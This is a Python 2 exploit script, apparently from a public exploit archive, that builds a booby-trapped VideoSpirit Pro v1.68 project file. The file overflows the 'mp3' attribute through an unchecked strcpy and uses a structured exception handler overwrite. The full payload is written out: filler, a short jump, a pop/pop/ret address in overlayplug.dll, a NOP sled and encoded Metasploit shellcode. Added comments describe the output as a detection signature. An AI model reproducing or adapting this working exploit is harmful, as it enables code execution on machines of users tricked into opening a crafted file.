# Exploit Title: VideoSpirit Pro v1.68 Local BoF Exploit
# Date: 01/08/2011
# Author: xsploitedsec
# URL: http://www.x-sploited.com/
# Contact: xsploitedsec[at]x-sploited.com
# Software Link: http://www.verytools.com/videospirit/download.html
# Vulnerable version: v1.68
# Tested on: Windows XP SP3 Eng

# Software description
#
# "VideoSpirit Pro is the most easily used Video Converter/Editor tools. For acting as a Video Editor,
# various slide effect/title/subtitle can be added to a video clip. Also, the video clip can be rotated,
# resized and warped. Multiple video/audio clips can be joined together. Converting speed is fast and
# the quality of output file is excellent."

# Vulnerability info
#
# VideoSpirit Pro is prone to a buffer overflow when parsing a (.visprj) project file that
# contains an overly long "mp3" value. This is because the application fails to properly bounds
# check the data before it is passed to strcpy().

#!/usr/bin/python

# NOTE(review): this is Python 2 code (print statement below, "\x.." string
# literals are byte strings). It does not run unchanged under Python 3.
#
# What the script does, end to end: it writes a single .visprj project file
# whose <valitem name="mp3" value="..."> attribute is a 5000-byte blob instead
# of a short value, and nothing else. Defensive use of this file: the shape of
# the output (an XML-like .visprj with one attribute value of exactly 5000
# bytes, dominated by long runs of 0x41 and 0x42) is a simple signature for
# a scanner or a quarantine rule.

import struct,sys,os

# Console banner printed before any work is done.
banner = (
"\r\n==============================================\n"
" VideoSpirit Pro v1.68 Local BoF PoC\n"
" Author: xsploitedsec\n URL: http://www.x-sploited.com/\n"
"==============================================\n");

print banner;

# Output path is argv[1]. With no argument the script does not exit: it
# prints a usage line, falls back to a fixed default name and records that in
# defaultname so it can say so later.
if len(sys.argv) < 2:
    print ("\r[!] Error No filename specified\n\nUsage:\n\n" + os.path.basename(sys.argv[0]) + " <outfile.visprj>");
    outfile = "xsploited.visprj"; #default
    defaultname = 1;
else:
    outfile = sys.argv[1];
    defaultname = 0;

# msfpayload windows/exec CMD=calc EXITFUNC=seh R | msfencode -e x86/fnstenv_mov
# -c 1 -b '\x00\x22\x0a\x0b\x1c\x0c\x2f\x21' > /tmp/encoded.txt
# [*] x86/fnstenv_mov succeeded with size 222 (iteration=1)

# Encoded shellcode emitted by the msfencode command above (222 bytes per its
# reported size). The script treats it as an opaque byte blob: it is only
# concatenated into the attribute value, never decoded or inspected here.
calc = (
"\x6a\x32\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xbf"
"\xf8\x92\x62\x83\xeb\xfc\xe2\xf4\x43\x10\x1b\x62\xbf\xf8"
"\xf2\xeb\x5a\xc9\x40\x06\x34\xaa\xa2\xe9\xed\xf4\x19\x30"
"\xab\x73\xe0\x4a\xb0\x4f\xd8\x44\x8e\x07\xa3\xa2\x13\xc4"
"\xf3\x1e\xbd\xd4\xb2\xa3\x70\xf5\x93\xa5\x5d\x08\xc0\x35"
"\x34\xaa\x82\xe9\xfd\xc4\x93\xb2\x34\xb8\xea\xe7\x7f\x8c"
"\xd8\x63\x6f\xa8\x19\x2a\xa7\x73\xca\x42\xbe\x2b\x71\x5e"
"\xf6\x73\xa6\xe9\xbe\x2e\xa3\x9d\x8e\x38\x3e\xa3\x70\xf5"
"\x93\xa5\x87\x18\xe7\x96\xbc\x85\x6a\x59\xc2\xdc\xe7\x80"
"\xe7\x73\xca\x46\xbe\x2b\xf4\xe9\xb3\xb3\x19\x3a\xa3\xf9"
"\x41\xe9\xbb\x73\x93\xb2\x36\xbc\xb6\x46\xe4\xa3\xf3\x3b"
"\xe5\xa9\x6d\x82\xe7\xa7\xc8\xe9\xad\x13\x14\x3f\xd5\xf9"
"\x1f\xe7\x06\xf8\x92\x62\xef\x90\xa3\xe9\xd0\x7f\x6d\xb7"
"\x04\x06\x9c\x50\x55\x90\x34\xf7\x02\x65\x6d\xb7\x83\xfe"
"\xee\x68\x3f\x03\x72\x17\xba\x43\xd5\x71\xcd\x97\xf8\x62"
"\xec\x07\x47\x01\xde\x94\xf1\x62\xb5\xf8\x92\x62");

# Leading part of a .visprj project file, as hex-escaped ASCII. It is plain
# XML-like text (the first bytes decode to '<version value="1" />') and ends
# right after '<valitem name="mp3" value="' -- the attribute the header above
# names as the one copied without a bounds check. Everything appended after
# this string becomes that attribute's value.
header = (
"\x3C\x76\x65\x72\x73\x69\x6F\x6E\x20\x76\x61\x6C\x75\x65\x3D\x22\x31\x22\x20"
"\x2F\x3E\x0D\x0A\x3C\x74\x72\x61\x63\x6B\x3E\x0D\x0A\x20\x20\x20\x20\x3C\x74"
"\x79\x70\x65\x20\x76\x61\x6C\x75\x65\x3D\x22\x30\x22\x20\x2F\x3E\x0D\x0A\x20"
"\x20\x20\x20\x3C\x74\x79\x70\x65\x20\x76\x61\x6C\x75\x65\x3D\x22\x34\x22\x20"
"\x2F\x3E\x0D\x0A\x20\x20\x20\x20\x3C\x74\x79\x70\x65\x20\x76\x61\x6C\x75\x65"
"\x3D\x22\x32\x22\x20\x2F\x3E\x0D\x0A\x20\x20\x20\x20\x3C\x74\x79\x70\x65\x20"
"\x76\x61\x6C\x75\x65\x3D\x22\x31\x22\x20\x2F\x3E\x0D\x0A\x20\x20\x20\x20\x3C"
"\x74\x79\x70\x65\x20\x76\x61\x6C\x75\x65\x3D\x22\x37\x22\x20\x2F\x3E\x0D\x0A"
"\x3C\x2F\x74\x72\x61\x63\x6B\x3E\x0D\x0A\x3C\x74\x72\x61\x63\x6B\x30\x20\x2F"
"\x3E\x0D\x0A\x3C\x74\x72\x61\x63\x6B\x31\x3E\x0D\x0A\x20\x20\x20\x20\x3C\x69"
"\x74\x65\x6D\x20\x6E\x61\x6D\x65\x3D\x22\x42\x6C\x75\x65\x20\x68\x69\x6C\x6C"
"\x73\x2E\x6A\x70\x67\x22\x20\x73\x65\x74\x3D\x22\x33\x22\x20\x76\x61\x6C\x75"
"\x65\x3D\x22\x30\x31\x30\x30\x30\x30\x30\x30\x35\x39\x30\x30\x30\x30\x30\x30"
"\x34\x33\x33\x41\x35\x43\x34\x34\x36\x46\x36\x33\x37\x35\x36\x44\x36\x35\x36"
"\x45\x37\x34\x37\x33\x32\x30\x36\x31\x36\x45\x36\x34\x32\x30\x35\x33\x36\x35"
"\x37\x34\x37\x34\x36\x39\x36\x45\x36\x37\x37\x33\x35\x43\x34\x31\x36\x43\x36"
"\x43\x32\x30\x35\x35\x37\x33\x36\x35\x37\x32\x37\x33\x35\x43\x34\x34\x36\x46"
"\x36\x33\x37\x35\x36\x44\x36\x35\x36\x45\x37\x34\x37\x33\x35\x43\x34\x44\x37"
"\x39\x32\x30\x35\x30\x36\x39\x36\x33\x37\x34\x37\x35\x37\x32\x36\x35\x37\x33"
"\x35\x43\x35\x33\x36\x31\x36\x44\x37\x30\x36\x43\x36\x35\x32\x30\x35\x30\x36"
"\x39\x36\x33\x37\x34\x37\x35\x37\x32\x36\x35\x37\x33\x35\x43\x34\x32\x36\x43"
"\x37\x35\x36\x35\x32\x30\x36\x38\x36\x39\x36\x43\x36\x43\x37\x33\x32\x45\x36"
"\x41\x37\x30\x36\x37\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x31\x45\x30\x30"
"\x30\x30\x30\x30\x30\x33\x30\x30\x30\x30\x30\x30\x32\x30\x30\x30\x30\x30\x30"
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x34\x38\x34\x32\x30\x30"
"\x30\x30\x34\x38\x34\x32\x30\x30\x30\x30\x38\x37\x34\x33\x30\x30\x30\x30\x34"
"\x38\x34\x32\x30\x30\x30\x30\x38\x37\x34\x33\x30\x30\x30\x30\x33\x45\x34\x33"
"\x30\x30\x30\x30\x34\x38\x34\x32\x30\x30\x30\x30\x33\x45\x34\x33\x34\x30\x30"
"\x31\x30\x30\x30\x30\x46\x30\x30\x30\x30\x30\x30\x30\x46\x46\x30\x30\x30\x30"
"\x30\x30\x46\x46\x46\x46\x46\x46\x46\x46\x30\x32\x30\x30\x30\x30\x30\x30\x43"
"\x38\x43\x38\x43\x38\x46\x46\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x33\x30\x30\x30\x30\x30"
"\x30\x36\x45\x36\x46\x30\x30\x45\x45\x45\x45\x45\x45\x45\x45\x30\x30\x30\x30"
"\x30\x30\x30\x30\x30\x30\x22\x20\x2F\x3E\x0D\x0A\x3C\x2F\x74\x72\x61\x63\x6B"
"\x31\x3E\x0D\x0A\x3C\x74\x72\x61\x63\x6B\x32\x20\x2F\x3E\x0D\x0A\x3C\x74\x72"
"\x61\x63\x6B\x33\x20\x2F\x3E\x0D\x0A\x3C\x74\x72\x61\x63\x6B\x34\x20\x2F\x3E"
"\x0D\x0A\x3C\x63\x6C\x69\x70\x20\x2F\x3E\x0D\x0A\x3C\x6F\x75\x74\x70\x75\x74"
"\x20\x74\x79\x70\x65\x6E\x61\x6D\x65\x3D\x22\x41\x56\x49\x22\x20\x6B\x65\x65"
"\x70\x61\x73\x70\x65\x63\x74\x3D\x22\x30\x22\x20\x70\x72\x65\x73\x65\x74\x71"
"\x75\x61\x6C\x69\x74\x79\x3D\x22\x30\x22\x3E\x0D\x0A\x20\x20\x20\x20\x3C\x74"
"\x79\x70\x65\x30\x20\x65\x6E\x61\x62\x6C\x65\x3D\x22\x31\x22\x3E\x0D\x0A\x20"
"\x20\x20\x20\x20\x20\x20\x20\x3C\x76\x61\x6C\x69\x74\x65\x6D\x20\x6E\x61\x6D"
"\x65\x3D\x22\x6D\x73\x6D\x70\x65\x67\x34\x76\x32\x22\x20\x76\x61\x6C\x75\x65"
"\x3D\x22\x6D\x73\x6D\x70\x65\x67\x34\x76\x32\x22\x20\x2F\x3E\x0D\x0A\x20\x20"
"\x20\x20\x20\x20\x20\x20\x3C\x76\x61\x6C\x69\x74\x65\x6D\x20\x6E\x61\x6D\x65"
"\x3D\x22\x33\x32\x30\x2A\x32\x34\x30\x28\x34\x3A\x33\x29\x22\x20\x76\x61\x6C"
"\x75\x65\x3D\x22\x33\x32\x30\x2A\x32\x34\x30\x22\x20\x2F\x3E\x0D\x0A\x20\x20"
"\x20\x20\x20\x20\x20\x20\x3C\x76\x61\x6C\x69\x74\x65\x6D\x20\x6E\x61\x6D\x65"
"\x3D\x22\x33\x30\x22\x20\x76\x61\x6C\x75\x65\x3D\x22\x33\x30\x22\x20\x2F\x3E"
"\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x3C\x76\x61\x6C\x69\x74\x65\x6D\x20"
"\x6E\x61\x6D\x65\x3D\x22\x31\x36\x30\x30\x30\x6B\x22\x20\x76\x61\x6C\x75\x65"
"\x3D\x22\x31\x36\x30\x30\x30\x6B\x22\x20\x2F\x3E\x0D\x0A\x20\x20\x20\x20\x3C"
"\x2F\x74\x79\x70\x65\x30\x3E\x0D\x0A\x20\x20\x20\x20\x3C\x74\x79\x70\x65\x31"
"\x20\x65\x6E\x61\x62\x6C\x65\x3D\x22\x31\x22\x3E\x0D\x0A\x20\x20\x20\x20\x20"
"\x20\x20\x20\x3C\x76\x61\x6C\x69\x74\x65\x6D\x20\x6E\x61\x6D\x65\x3D\x22\x6D"
"\x70\x33\x22\x20\x76\x61\x6C\x75\x65\x3D\x22");

# Trailing part of the project file: closes the mp3 valitem ('" />') and
# carries the remaining entries through the final '</output>' line, so the
# result still parses as a complete document up to the oversized attribute.
footer = (
"\x22\x20\x2F\x3E\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x3C\x76\x61\x6C\x69"
"\x74\x65\x6D\x20\x6E\x61\x6D\x65\x3D\x22\x31\x32\x38\x6B\x22\x20\x76\x61\x6C"
"\x75\x65\x3D\x22\x31\x32\x38\x6B\x22\x20\x2F\x3E\x0D\x0A\x20\x20\x20\x20\x20"
"\x20\x20\x20\x3C\x76\x61\x6C\x69\x74\x65\x6D\x20\x6E\x61\x6D\x65\x3D\x22\x34"
"\x34\x31\x30\x30\x22\x20\x76\x61\x6C\x75\x65\x3D\x22\x34\x34\x31\x30\x30\x22"
"\x20\x2F\x3E\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x3C\x76\x61\x6C\x69\x74"
"\x65\x6D\x20\x6E\x61\x6D\x65\x3D\x22\x32\x20\x28\x53\x74\x65\x72\x65\x6F\x29"
"\x22\x20\x76\x61\x6C\x75\x65\x3D\x22\x32\x22\x20\x2F\x3E\x0D\x0A\x20\x20\x20"
"\x20\x3C\x2F\x74\x79\x70\x65\x31\x3E\x0D\x0A\x20\x20\x20\x20\x3C\x74\x79\x70"
"\x65\x32\x20\x65\x6E\x61\x62\x6C\x65\x3D\x22\x30\x22\x20\x2F\x3E\x0D\x0A\x3C"
"\x2F\x6F\x75\x74\x70\x75\x74\x3E\x0D\x0A");

# The attribute value itself, built in five fixed pieces and then padded so
# the whole value is exactly 5000 bytes regardless of the shellcode length:
# 104 bytes of 0x41 filler, a 4-byte short jump, one 32-bit address packed
# little-endian ("<L"; the author's comment identifies it as a pop/pop/ret
# gadget in overlayplug.dll), 24 NOPs, the encoded shellcode, and 0x42 padding.
# For a sibling entry such as msmpeg4v2 the value is a short codec name, so
# a value of this size is what a validator or scanner should reject.
payload = "\x41" * 104;
payload += "\xEB\x06\x90\x90"; #short jmp
payload += struct.pack("<L",0x100B0B94); #p/p/r - overlayplug.dll (Apps path)
payload += "\x90" * 24; #small nop sled
payload += calc; #plenty of room for whatever
payload += "\x42" * (5000 - len(payload)); #junk padding

# Complete file image: document head, oversized attribute value, document tail.
finalstr = (header + payload + footer);

if defaultname == 1:
    print("\n[!] Defaulting to xsploited.visprj");

print("[*] Creating malicious project file");

# Write the file image to the chosen path. Only IOError is handled; any other
# failure propagates. Note that an existing file at outfile is overwritten
# without confirmation.
try:
    out_file = open(outfile,'w');
    out_file.write(finalstr);
    out_file.close();
    print("[+] File created successfully ("+ outfile + ")\n[-] Exiting...\r");
except (IOError):
    print("[!] Error: unable to create file \n[-] Exiting...\r");